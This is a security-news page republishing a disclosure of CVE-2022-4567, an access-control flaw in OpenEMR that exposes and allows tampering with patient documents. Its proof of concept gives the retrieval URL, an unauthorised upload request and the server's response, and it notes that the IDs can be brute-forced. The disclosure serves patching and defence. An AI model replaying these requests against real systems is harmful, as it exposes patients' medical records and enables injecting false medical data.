Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-4567: Broken Access Controls in Patient Files in openemr

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.

CVE
Open in Source
#debian#apache#git#php#auth

Description

An authenticated user without document access has the ability to direct access any document in the system by using a url similar to this http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19. The autoincrement identifier was also susceptible of being bruteforced for both patient_id and document_id.

A second instance allowed an authenticated user without document access to upload file to any user repository.

Proof of Concept

The first one allows any user to access a document by referencing the patient_id and document_id:

http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19

The second instance affected the upload functionality. The following example illustrates the situation:

POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1
Host: REDACTED
(...snip...)
Upgrade-Insecure-Requests: 1

-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="file[]"; filename="testBAC.txt"
Content-Type: text/plain

TESTFILE
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream

(...snip...)
-----------------------------247482557730593022112237721191--

The response displayed a message saying Documents Not Authorized, but the file was successfully uploaded:

REQUEST:
GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
(...snip...)

RESPONSE:
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 16:07:36 GMT
Server: Apache/2.4.54 (Debian)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="testBAC.txt"
Content-Length: 8
Connection: close
Content-Type: text/plain;charset=utf-8

TESTFILE

Impact

Any user with access to the platform would be able to bypass document access restrictions and download any document related to any user in the system. It was also possible to inject document to any patient that could leverage malicious data used as valid medical data.

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE